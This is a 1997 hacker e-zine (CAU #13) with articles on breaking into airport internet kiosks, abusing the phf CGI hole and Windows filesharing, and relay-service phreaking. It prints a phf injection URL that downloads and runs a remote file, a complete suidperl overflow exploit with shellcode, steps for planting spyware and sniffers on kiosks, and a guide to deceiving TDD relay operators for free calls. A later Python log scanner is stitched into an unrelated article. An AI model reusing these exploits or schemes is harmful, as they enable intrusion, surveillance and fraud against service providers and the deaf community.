Computer Academic Underground
Electronic Magazine
#0013
1115.97

##############################################################################

Table of Contents

Foreword

General
  Alphabetical Member Listing
  817 2600 Meeting
  New CAU File Releases                      I)ruid

Hacking
  GTE Cybercenters II                        I)ruid
  Manipulating Phf                           protocol
  The Truth About Windows Filesharing        Crimson Assassin
  Exploit of the Month                       I)ruid

Phreaking
  TDD Systems and You                        I)ruid
  Understanding A "T" Order                  FoneMan & broken-

Closing

##############################################################################

Foreword

First of all, I would like to say that this issue of the CAU E-Zine is dedicated to Detectives Busker and Ware, of the Fort Worth Police Department. Thanks for being a couple of complete assholes and assuring us that our assumption that Law Enforcement in the United States is nothing but a collection of close-minded gimps was correct and still holds true.
I)ruid

##############################################################################

General

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

Alphabetical Member Listing

Handle              IRC Nick      E-Mail
--------------------------------------------------------------
Crimson Assassin    Crimson_A     crimson@caughq.org
I)ruid              I}ruid        druid@caughq.org
Fizban              Fizban^       fizban_cau@hotmail.com
int3l               int3l         int3l@caughq.org
Sublime             sublime       sublime@caughq.org
uv                  uv_           uv817@hotmail.com
--------------------------------------------------------------

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

817 2600 Meeting

First Friday of Every Month
6:00pm until 9:00pm

Cafe Cybre
481 Harwood Road
Hurst, Texas
Phone: METRO: 817.268.0060

So Be There!!

I)ruid

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

New CAU File Releases

This month, I have released InfoBot version 1.0.0, an IRC bot designed to just do some random functions as well as greet people, define words for people, do decimal to hex and decimal to binary conversion, and calculate equations for people.

Also I have released ServerCheck version 0.91 Beta, a System Administration utility most useful to those people that have those nifty alpha-numeric pagers with email addresses. ServerCheck is a client-server administrative application that causes an administrative machine to contact multiple servers and check for certain processes to make sure they are running, definable by config file on the admin machine. ServerCheck also features encrypted data packets to communicate from client to server, to add a little more security to your network.

I have also released this month the CAU Encrypted Command-Line Server, which is basically a limited version of ssh with not as much fancy encryption. I just wanted to try my hand at client/server/user interaction, as well as create a useful little Trojan Horse type program.
As the filename suggests, this program also features encrypted data packets, and allows you to connect without login or password (provided that the client you use can correctly handshake with the server) to any server on any given machine and execute a single-response command line.

Anyway, you can get all of these new releases from the CAU FTP site, at ftp.caughq.org, or on the CAU Website at http://www.caughq.org. Betcha can't wait to see what you all get for Christmas (:

I)ruid

##############################################################################

Hacking

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

GTE Cybercenters II

Remember last month when I ( I)ruid ) wrote an article about the GTE Cybercenters in D/FW International Airport? If you liked that article, you're gonna LOVE this one. I am writing this article, but this hack was mainly accomplished by int3l and myself, so he gets some credit too... (: I don't think either one of us could have done it alone; this was really a group effort, and that's what CAU is all about.

Alright. If you remember correctly, last month (go read it) I stated that using the GTE Cybercenter's FREE STUFF menu, you could go to one of the free webpages that sets itself up in frames and has an Infoseek search engine search field on it. Using this, you can work your way back to, say, www.yahoo.com, and use the main frame of the free website /as/ a web browser (links targeted at "_top" will not work).

After writing last month's article, I decided to sit down and code a few CGIs and put them up on my website, so that I could do things remotely while I was at the Cybercenter. I'll talk a little more about this in a little bit. Right now I want to talk about other things you can do while you're in the browser.

Other than being able to hop around links from page to page and basically go anywhere you want on the web (as long as it's linked), I also decided to see what I could do with Java.
I went to Yahoo and searched for "IRC + Java", and then followed a few links until I found a site with a Java IRC client. The browser ran the applet, and in a few seconds, my friends were talking to me at the Airport. So, if you're any good at coding Java or scripting JavaScript, there's a WORLD of stuff you can do via the browser.

And speaking of programming, that brings me to my next point: Good ol' CGIs. As I mentioned, the GTE Cybercenter's free browser didn't have a location bar, because they don't want you going anywhere other than the free site they sent you to. If you're any good at programming, I'm sure you can write a simple CGI to emulate a location bar. So I sat down and in about 10 minutes had a working location bar, that would use META HTTP-EQUIV Refresh tags to "forward" you to whatever you typed in the HTML form "location bar." So that takes care of the location bar problem, and you now have a fully functional basic web browser.

And while we're on CGIs, I'll let you in on a few other neat tricks. The next CGI I wrote was a simple environment variable displayer. All this CGI did was spew some HTML and tell me the environment variables sent along with the HTTP request. These included the Cybercenter's IP, hostname, browser version (most were various versions of Mozilla, from 2.0 to 4.0), and so on. That is a bit of useful information.

Another CGI I wrote was a Samba server and smbclient based Windows filesharing username and password grabber, which will tell me the workgroup name and login and password of the machine I'm viewing the page on, but the GTE Cybercenters weren't set up for filesharing (at least not yet... hehheh...) so this didn't do much.

The next CGI I wrote was meant to exploit the browser (MSIE 3.0 compatible) by forcing it to run various applications via the browser.
It downloaded the desktop links the way it was supposed to, but the program that handles the GTE Cybercenter user interface seemed to have a wrapper that made alert box decisions FOR the user, thus preventing me from having the webpage run applications.

And finally, the last CGI simply winnuked the machine that ran it. If you don't know what winnuke is, go to #windows and ask someone, and maybe they'll beat a clue into your thick skull. And yes, the GTE Cybercenters are winnukeable... happy happy day! Normally I would think that winnuking the GTE Cybercenter is lame and has no purpose, but here it was for the greater good. Because we could winnuke the machine, we could cause it to reboot by hitting ctrl-alt-del at the pretty Windows 95 blue error screen where it screams about VXDs and memory addresses. Once ctrl-alt-delete reboots the machine, you can then venture into the system CMOS, etc., as well as hit ctrl-F8 as Windows is starting up (you gotta be quick, that damn GTE Cybercenter program starts up REAL quick) and get yourself into the Windows 95 boot menu.

Now obviously you realise that you now have a pretty good grip on the system. If you go into Command Prompt Only mode, you can then edit such files as WIN.INI and SYSTEM.INI, and get rid of that pesky Cybercenter interface that wants you to swipe a credit card before doing anything and replace it with the standard Windows 95 interface (REM NEWSHELL=bleh bleh), or hell, a DOS interface if you want (MSDOS.SYS : GUI=0).

Alright, now you have it booting to Windows 95, and my my... what is that? Could that be a start bar? Now you basically have complete control over the system, and can execute any applications you want, all for free. You can also download and install anything you want (we'll talk about a few good suggestions in a second), and you can even change the desktop to a picture of your favorite bikini-clad sex-goddess or little furry hamster, whatever your preference should be.
You can also turn on or off any preferences on the machine, such as Windows filesharing, Network Neighborhood, etc. A good thing to do is set up Network Neighborhood and fileshare out the machine's drives, accessible to everyone (or password it if you must, but may I remind you that information wants to be free... (: ). Now you can remotely map the machine's drives from your house or school using a Windows box or smbclient for *nix. Another package you may want to install is the Netspy client program, and set up the Netspy server program (the Master) on your machine at home. You can now watch the machine in real time and see what it's doing, any time you want. Another good idea is a Windows 95 packet sniffer, such as PacketBoy (remember, you can map the machine from home and download the sniffer logs). You could also set up a Windows 95 webserver and host a website off of that machine (using filesharing to upload your page), or hell, install an FTP server program and upload that way. The possibilities are endless.

And thus ends the Local section of this article. Obviously you can see the possibilities here. Now, what can we do remotely, you ask? Not much unless you set up something, because the Cybercenters are on dynamic IPs through uu.net, and are pretty hard to find unless you have something mailing you or pinging you or something of that sort. But anyway, that's all for this article, on to something else.

And something to leave you with, this very insightful fortune I got from Tia's Mexican Restaurant in Little Rock, Arkansas: "No dan, no quiten."

I)ruid

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

Manipulating Phf

Why? Just read on.

Ok, I saw what most people did with the PHF hole and I know it's considered an old hack, but I still thought there was something you could do that was more than just "cat /etc/passwd". I thought the things you want to do (usually) do not require you to crack the password file locally.
Why not, if that was the thing you wanted to do, do it remotely? Thus the base idea is born.

So first is method, how do I:

1 Get a program on a remote machine using as few holes or programs as possible.
2 Run the program on the remote machine and control its execution.

The first goal was achieved through "ncftp -a". It is a way to specify an arbitrary host and arbitrary file to d/l. The only requirement is that it be anonymously accessible. The second is almost trivial but needs attention to one thing, a place for the UID of the httpd to write. /tmp is the answer (Attention! This is the first use of a directory being used as the first word in a sentence. My English teacher would be so proud.). So the steps are:

1 cd to /tmp
2 ncftp -a HOST:FILE
3 chmod +x FILE
4 /tmp/FILE

No prob. Now what does FILE contain? Well, whatever you want. I have a sample script later in this article that sets up a user interface using HTML. Now you could set up a script that does one task and ends but, what fun is that? I thought getting root is just the outcome. The journey is the fun part, so what can the script do to add to my (your) enjoyment? Well, for yourself you will have to answer that but, for me:

1 seeing who is on
2 seeing ps output
3 checking my UID (useful for some attacks if your UID is 65535)
4 viewing /etc/passwd (ok ok I know)
5 cracking /etc/password (mo better)
6 checking /var/adm/messages (hehe, haven't found a password yet but, I'll keep trying)
7 this number intentionally left blank
8 making a file.lst and then gzipping it and offering it as a link to d/l

That's all for now but, if you think of other things, either code them and mail them, or just the idea, to I)ruid.

Protocol (the way to do things)

[ EDITOR'S NOTE: Here's a quick example that came along with this article but was not included in the article. The servernames have been removed to protect the innocent, but I'm sure you'll get the idea.
(: This is a long URL and had to be broken up, but normally this would be one long URL: ]

http://:80/cgi-bin/phf?Jserver=&Qalias=%0acd%20/tmp%0ancftp%20-a%20%3agotcha%0achmod%20%2bx%20gotcha%0a/tmp/gotcha

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

The Truth About Windows Filesharing

Ok, let's face it people, the majority of computers being used and idling on the Internet today are Windows 95 boxes. Sad but true. From past experiences in search of a phat Unix box to play with, I, like most people, would just ignore them, thinking that there is no logical way of getting into them (they are Windows 95 machines for GODZ SAKE!). That's the kind of attitude I had and I think it is safe to say that the majority of people have.

That all changed one day when I was installing a program called SAMBA on a Linux box at work. Samba basically allows you to share files on the Linux box with Windows 95/NT networks (that's the short def). A nice utility comes with SAMBA called 'smbclient'. This program basically allows you to browse shared drives on a remote computer, without doing all the shit that you have to do in Windows 95 to accomplish the same task. I started using the program on remote Windows 95 boxes and to my amazement, most of the Windows 95 boxes that were connected to the net had filesharing enabled, and I was able to browse their hard drives remotely from my Linux box. Pretty neat utility.

All this is nothing new, Samba has been around for a while. It's just not known to many people that this can be done. The format is pretty simple and easy to understand. Go grab Samba from the net at 'http://samba.anu.edu.au/samba/', compile it, and the file 'smbclient' is in the bin directory. There are some other things you can do with Samba itself. Check the net for some resources. A good place to start is ntsecurity.net. They have a pretty good article on a problem with Samba and Win95 network passwords.
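Looking back at the phf URL quoted in the editor's note after the Manipulating Phf article, here is the defender's side of it: an added example (not from the zine or any of its authors) that reads NCSA-format access-log lines, decodes each CGI parameter the way the server would, and flags any parameter carrying an encoded newline, which is what let phf's popen() call run the appended commands. The log lines and the example.invalid host are constructed for this example.

```python
"""Spot phf-style newline injection in web-server access logs (added example)."""
import re
from typing import Dict, List, Optional
from urllib.parse import unquote_plus, urlsplit

# NCSA common log format, as written by Apache/NCSA httpd of the period.
CLF = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<url>\S+)(?: \S+)?" (?P<status>\d{3}) \S+'
)

# Constructed sample log. The second line carries the URL shape quoted in the
# editor's note (host placeholder example.invalid); the others are benign or
# a simpler variant of the same trick.
SAMPLE_LOG = """\
192.0.2.10 - - [15/Nov/1997:22:14:03 -0600] "GET /cgi-bin/phf?Qalias=smith HTTP/1.0" 200 1204
192.0.2.77 - - [15/Nov/1997:22:15:41 -0600] "GET /cgi-bin/phf?Jserver=&Qalias=%0acd%20/tmp%0ancftp%20-a%20example.invalid%3agotcha%0achmod%20%2bx%20gotcha%0a/tmp/gotcha HTTP/1.0" 200 354
192.0.2.77 - - [15/Nov/1997:22:16:02 -0600] "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 200 2911
198.51.100.5 - - [15/Nov/1997:22:17:30 -0600] "GET /index.html HTTP/1.0" 200 5120
"""


def split_query(query: str) -> Dict[str, str]:
    """Decode a query string the way a CGI would see it (%XX and '+' handled),
    keeping parameters with empty values such as phf's Jserver=."""
    params: Dict[str, str] = {}
    for pair in query.split('&'):
        if not pair:
            continue
        name, _, value = pair.partition('=')
        params[unquote_plus(name)] = unquote_plus(value)
    return params


def injected_commands(value: str) -> List[str]:
    """Return the command lines smuggled into a parameter after its first
    newline. phf handed Qalias to popen(), so each decoded newline started a
    fresh shell command; a value without newlines is ordinary data."""
    if '\n' not in value:
        return []
    return [line.strip() for line in value.split('\n')[1:] if line.strip()]


def analyse_line(line: str) -> Optional[dict]:
    """Parse one access-log line and report the first parameter that carries
    an injected newline, or None for lines that look clean."""
    match = CLF.match(line)
    if not match:
        return None
    url = urlsplit(match.group('url'))
    for name, value in split_query(url.query).items():
        commands = injected_commands(value)
        if commands:
            return {
                'client': match.group('client'),
                'time': match.group('time'),
                'path': url.path,
                'parameter': name,
                'commands': commands,
                'status': int(match.group('status')),
            }
    return None


def scan_log(text: str) -> List[dict]:
    """Run analyse_line over a whole log and collect the findings."""
    return [f for f in map(analyse_line, text.splitlines()) if f]


if __name__ == '__main__':
    for finding in scan_log(SAMPLE_LOG):
        print(f"{finding['client']} {finding['time']} {finding['path']} "
              f"via {finding['parameter']}: {' ; '.join(finding['commands'])}")
```

A status of 200 on a flagged line means the CGI answered the request rather than rejecting it, so the host should be checked for the dropped file in /tmp as well as patched.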
Crimson Assassin

[ EDITOR'S NOTE: Another good article related to this topic can be found here: 'http://199.103.168.8:4135/avian/papers/cifs.txt'. This article was written by Hobbit. Also, I have implemented an example of the problem described on NTSecurity.com about grabbing passwords, which is located at 'http://www.cytlok.com/cgi-bin/cytlok.com/sectest' ]

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

Exploit of the Month

Alright, this is a new feature of the CAU E-Zine, the exploit pick of the month! Basically this is just a replacement for the prefix scan of the month. We may bring back the scan of the month as they become available. I may start prefix scanning again; however, I would like to get some scans from other NPAs than just 817. I have a metro line to play with so I may be scanning some 214 and 972 WCs.

This exploit appeared on the BugTraq mailing list on 11.13.95, and is written completely in Perl, to exploit suidperl! I thought that was kinda funny, so it became our "Exploit of the Month." Anyway, here's the exploit code, and it is also included separately in the zine, named 'sperl_bufovr.pl'.

And here's the exploit script:

---== (SNIP)
#!/usr/bin/perl
# yes, this suidperl exploit is in perl, isn't it wonderful? :)

$| = 1;

$shellcode =
    "\x90" x 512 .                # nops
    "\xbc\xf0\xff\xff\xbf" .      # movl $0xbffffff0,%esp
    # "standard shellcode" by Aleph One
    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" .
    "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" .
    "\x80\xe8\xdc\xff\xff\xff/bin/sh";

# start and end of .data
# adjust this using /proc/*/maps
$databot = 0x080a2000;
$datatop = 0x080ab000;

# trial and error loop
$address = $databot + 4;
while ($address < $datatop) {
    $smash_me = $shellcode .
        ('A' x (2052 - length($shellcode))) .
        (pack("l", $address) x 1000) .
        ('B' x 1000);
    $pid = fork();
    if (!$pid) {
        exec('/usr/bin/sperl5.003', $smash_me);
    } else {
        wait;
        if ($? == 0) {
            printf("THE MAGIC ADDRESS WAS %08x\n", $address);
            exit;
        }
    }
    $address += 128;
}
---== (SNIP)

This exploit is supposed to work on Intel-based Linux systems with suidperl. Have fun and be good...

I)ruid

##############################################################################

Phreaking

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

TDD Systems and You

If you will remember way back in CAU E-zine issue Number 2 or so, we allowed 0mega to put in a VERY small article about TDD. Let's just say that that little bit of fluff text really sucked. So here, in a little more detail and hopefully a lot more style, is another article about TDD Systems in your area and what you can use them for, or what you can make them do.

First of all, it helps to have the TDD/TTY (Terminal for the Deaf and Dumb) telephone number and data number for terminals. The easiest way to get the latter is to simply open your local telephone book and thumb through the first couple of pages where emergency numbers and such are found. Normally there will be an entry on one of these pages that simply says "TDD/TTY terminals for the Deaf 1-800-etc..." or will have a local number instead of a 1-800 number. If your area uses a toll free 1-800 number, these systems will be a little more useful to you than a local number, especially if you're calling from a TDD terminal in a public facility such as an airport or mall, which may require you to insert a quarter for a local call or some other fee.

The second number that is useful to you is the voice telephone number for TDD Operators. Just to clarify, the Data number allows you to dial in via data terminal to the operators, and have them connect you with a live person. The Voice number allows you to call an operator, and have them connect you with a data terminal. If you don't know anything about TDD Systems, this may sound a little confusing. How do I talk voice to a data terminal, you ask?
Here's how it works: When you first dial the Data number, an operator will begin typing to you. I'll get into the actual acronyms and ID numbers and such a little later; we'll be general here. So the operator tells you who he or she is, and you are allowed to type back and forth to the operator... usually at the beginning of your session, you will POLITELY ask the operator to dial a number for you. They will be happy to connect you to any voice number anywhere, usually at no cost to you. The TDD Operator will then tell you that the number you dialed is ringing, etc... and inform you when it is answered. The TDD Operator will now tell you to hold on a minute, while he or she explains to the live person what exactly is going on. Basically, from then on, everything you type into the terminal is relayed via the TDD Operator to the live person, and whatever the live person says to the TDD Operator will be typed into the terminal for you to see.

Usually the TDD Operator's job is to be totally transparent in the conversation, and not respond as an individual. For example, if you type into the terminal "I have large breasts", the TDD Operator will actually say "I have large breasts." Now, as you can probably imagine, this can be hours and hours of fun for you and the whole family, simply making your loving TDD Operator say very interesting things. Also you have probably figured out that you can call the Voice TDD Line and have them call your friend's computer and type stuff to him or her. Another option is to have the TDD Operator connect you data to data. Normally they will not do this, assuming that if you have a terminal you could dial the other terminal directly, but they DO have the ability to do this for you.

All of this can be great fun, but that's not what I find most interesting about it. What I find useful is that most TDD Operators (given you are extremely polite) will connect you with any phone number you give them, long distance or local.
I've even gotten TDD Operators to dial overseas calls 2 out of 5 times. The trick is really to just be extremely polite and assume the role of a deaf veteran or other hearing-impaired individual that really doesn't know much about computers, and even less about their own TDD terminal. However, you can't be too ignorant about it, or they will figure out sooner or later that you really are not deaf and you're just trying to get a free long distance phone call to your friend Malikai in Chicago. For example, after everything you type, you must type "GA" (Go Ahead) so that your TDD Operator knows that you are finished typing and it's time for them to relay the message. Another common and useful acronym to use in the TDD System is NBR, which stands for Number (brilliant, huh?).

Another thing to remember is that there may not be that many deaf people in your area, and usually a TDD Operator room is only staffed with two or three Operators. As much as we would like them to be, these Operators are usually not extremely stupid, and will figure out (especially if you call them over and over and over) your style of typing and such and also catch on to you that way. I find that varying how you ask to dial the number usually throws them off. For example:

Please dial 817xxxxxxx GA
Could you please dial 817-xxx-xxxx for me? GA
Dial 817.xxx.xxxx for me please GA
and
Jo' main... i gotz tew kall muh homie at eight-one-seven...etc

If you will notice, I varied the placement of the number in my request and the number delimiters for each request. If you ask the same way every time, they will catch on and begin denying your requests, or if you are in a public place, begin to request that you insert coinage or some other form of monetary payment.

Once again, I can't stress enough the importance of being EXTREMELY polite. These Operators can be real difficult if you don't say please and thank you and use other proper etiquette such as that.
Also don't come right out and ask them to dial a number for you. Both you and they know that that is why you called, and that is what eventually will come up. Some Operators respond extremely well to small talk, even things as simple as "Hello, how are you today?" They will say "I'm doing fine, thank you... can I dial a number for you?" and you're good to go. And just a cautious note, if you curse at them, they will usually hang up on you, or at least be very mean to you. However, once they have connected you to the number you are dialing, and their only concern is to relay what is said back and forth, you can say whatever you damn well please and they can't say anything about it.

In a final note, please remember that TDD is meant for the hearing-impaired, and this service should in NO WAY be abused. In fact, I rarely use it, and only from public places such as the Airport when I really need to make a phone call, or occasionally at a party when we feel like making a female TDD Operator tell us she has large breasts.

I)ruid

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

Understanding The Assignment Area From A "T" Order

In this article I'm going to show you how to read and understand the assignment area from a "T" order. First I'll blow up an example of an assignment area and then break it down into smaller portions so it's easier to understand. Let's have a look at the entire assignment area:

---ASGM
G1 TN 708 304 1250 FA 520 SHORELY DR, BARINGTN, IL /LOC APT 101/RT 1005/RZ 13 IOE 01010-011-30/EXK 708 381/TN 708 304-1250/LPS/DF F10-04-064C/OAB KAY
G2 WC 708 381/CT
IF1 /CA 25/PR 2324/DF F10-04-106V /PRQ N/BP G-W+V-BR/OPC BL-R+W-BL/TEA CP200 E NW HWY; EXJ /TPR 111613 RO ORD F004546723 DD 95-06-12
IF2 /CA 200N/PR 126/BP 1/TEA IT 520 SHORELY DR; CIW

Okay, now you're probably looking at that wondering what the hell it all means. The G1 area shows the phone number for the following cable and pair assignment.
Yes, that's right, that TN stands for Telephone Number. Wow, it's that easy FoneMan? Damn straight. The FA part of the assignment contains the destination address. Obviously if the town name is too large they're going to abbreviate it like the example above. See? This isn't that hard :)

The G2 line is very important. The first part shows the wire center. Wow, there's another one of those acronyms, that's right, WC stands for Wire Center. Often the Telco will refer to the WC as the EWO. If you see CT in the second part, that means it's a cut-through. Wow FoneMan, this shit is easy!

The IF1 section gives details about the cable that leaves the CO. In this case, the new service leaves on cable 25, and pair 2324. This cable runs to a Cross Box at 200 E. Northwest Highway (TEA). To connect this cable to the next leg of cable, the tech will connect the white-striped green wire (from the F1 cable) to the red-striped blue wire (of the F2 cable) and the brown-striped violet wire (F1) to the black-striped white wire (F2). Actually, this is already done in this case. You can tell by the EXJ (EXisting cross-connect Jumper) after the semicolon.

Well, that's pretty much it. I hope this article has helped you some. The person reading this should have a basic knowledge of phones to understand things such as cable, pair, wire center, etc. This is one of the few articles I write about phreaking, or anything for that matter, so enjoy. Peace out.

FoneMan
broken-

##############################################################################

Closing

Well, that's it for the November issue... A MUCH better issue than we've had in the past. Next month will be the Christmas issue, oh what fun! That means we all get presents or something... Well anyway, hope you enjoy your turkey and stuffing, and if you don't celebrate Thanksgiving, whatever you happen to be eating on the day we call Thanksgiving...

And on a final note, I am now making an effort to be at EVERY Ft. Worth 2600 meeting at Cafe Cybre because attendance has been null, probably because no one shows up and they realize that no one else is there for 2600... Well, you can't miss me, I wear a bright green trench coat... check out the CAU Website (http://www.caughq.org) for details on when and where the Ft. Worth 2600 meeting is held, or look at the top of this zine. So you can be sure that at least one person will be there for the Ft. Worth 2600 meeting... and when I'm there, other people usually show up, so I'll see you there.

I'd also like to remind everyone of the 3 email addresses set up to support this e-zine, 'articles@caughq.org', 'letters@caughq.org', and 'zine@caughq.org', used for article submissions, letters to previous authors or the editor, and general email, respectively.

I)ruid

##############################################################################

Computer Academic Underground